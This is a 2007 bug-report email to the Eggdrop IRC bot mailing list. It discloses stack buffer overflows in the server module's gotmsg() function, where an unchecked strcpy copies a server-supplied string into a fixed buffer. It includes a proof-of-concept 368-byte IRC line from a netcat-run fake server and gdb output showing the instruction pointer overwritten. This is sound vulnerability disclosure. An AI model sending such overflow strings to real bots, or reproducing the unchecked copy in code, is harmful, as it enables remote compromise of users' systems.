Bugs: server module buffer overflows

Forever B0rked forever.b0rked at gmail.com
Sun Apr 15 15:48:50 CST 2007


I was taking a quick look at some of the code behind the eggie modules and I
ran across a few stack based overflows. I am incredibly surprised that no
one has reported these yet.

It seems that you are relying on the fact that the server the bot is
connected to is sane and not malicious, but I was able to exploit these
flaws by opening a
netcat listener and connecting the bot to it, then sending whatever string I
needed to.

For example:

static int gotmsg(char *from, char *msg)
{
  char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
       *p, *p1, *code;

........

ignoring = match_ignore(from);
  to = newsplit(&msg);
  fixcolon(msg);
  /* Only check if flood-ctcp is active */
  strcpy(uhost, from);

By sending the following string:

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(thats 368 bytes)

gdb output:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 14990]
0x42424242 in ?? ()
(gdb) i r $eip
eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious
that this could allow remote code execution as well. I didn't spend too much
time looking at the rest of the code, this just happened to catch my eye
while I was glancing over it. I did notice a few others that were along the
same lines as this, but I didn't test them or document them, although I
would be happy to do if you want more information.

Given the fact that you have to convince someone to connect to a malicious
server, this isn't -THAT- serious, but if someone had the proper console
permissions or was able to coerce someone to connect their eggdrop to a
malicious server, then it could result in a compromise.

If you have any other questions then please let me know. I might go through
the rest of the code in greater depth later, but I don't have the time right
now.



More information about the Bugs mailing list